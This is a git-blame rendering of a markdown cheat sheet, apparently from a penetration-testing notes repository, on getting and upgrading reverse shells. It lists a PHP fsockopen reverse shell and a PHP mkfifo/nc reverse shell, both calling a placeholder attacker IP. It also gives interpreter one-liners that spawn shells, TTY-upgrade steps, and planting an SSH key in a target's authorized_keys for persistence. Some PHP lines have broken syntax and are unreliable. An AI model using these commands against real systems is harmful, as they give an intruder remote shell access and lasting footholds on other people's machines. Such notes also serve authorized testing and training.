2021-08-27 00:26:26 +02:00
|
|
|
# Upgrade Reverse Shell
|
|
|
|
|
|
2021-11-24 23:52:42 +01:00
|
|
|
* [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
|
|
|
|
|
* [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/)
|
|
|
|
|
* [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
|
|
|
|
|
|
2021-08-27 00:26:26 +02:00
|
|
|
## Via interpreter
|
|
|
|
|
### PHP
|
|
|
|
|
* reverse shell
|
|
|
|
|
```php
|
|
|
|
|
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
|
|
|
|
|
```
|
|
|
|
|
```php
|
|
|
|
|
php -r 'exec ("/bin/bash")";'
|
|
|
|
|
```
|
|
|
|
|
* Sometimes even
|
|
|
|
|
```php
|
|
|
|
|
php -e 'exec "/bin/bash";'
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### Python
|
|
|
|
|
```python
|
|
|
|
|
python -c 'import pty; pty.spawn("/bin/bash")'
|
|
|
|
|
```
|
|
|
|
|
|
2021-10-23 02:03:06 +02:00
|
|
|
### Perl
|
|
|
|
|
```perl
|
|
|
|
|
perl -e 'exec "/bin/sh";'
|
|
|
|
|
```
|
|
|
|
|
|
2021-11-24 23:52:42 +01:00
|
|
|
### Script
|
|
|
|
|
```sh
|
|
|
|
|
/usr/bin/script -qc /bin/bash /dev/null
|
|
|
|
|
```
|
|
|
|
|
|
2021-08-27 00:26:26 +02:00
|
|
|
## Next
|
|
|
|
|
1. `ctrl` + `z`
|
|
|
|
|
2. `stty echo -raw`
|
|
|
|
|
3. `fg`
|
2021-12-04 00:26:03 +01:00
|
|
|
4. `export SHELL=bash`
|
|
|
|
|
5. `export TERM=xterm`
|
2021-08-27 00:26:26 +02:00
|
|
|
|
|
|
|
|
## Via SSH
|
|
|
|
|
* `ssh-keygen`
|
|
|
|
|
* copy priv key and `chmod 600`
|
|
|
|
|
* `cat id_rsa.pub > authorized_keys` on target
|
2021-10-05 01:48:56 +02:00
|
|
|
|
|
|
|
|
## As Code
|
|
|
|
|
### PHP
|
|
|
|
|
```sh
|
|
|
|
|
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>
|
|
|
|
|
```
|
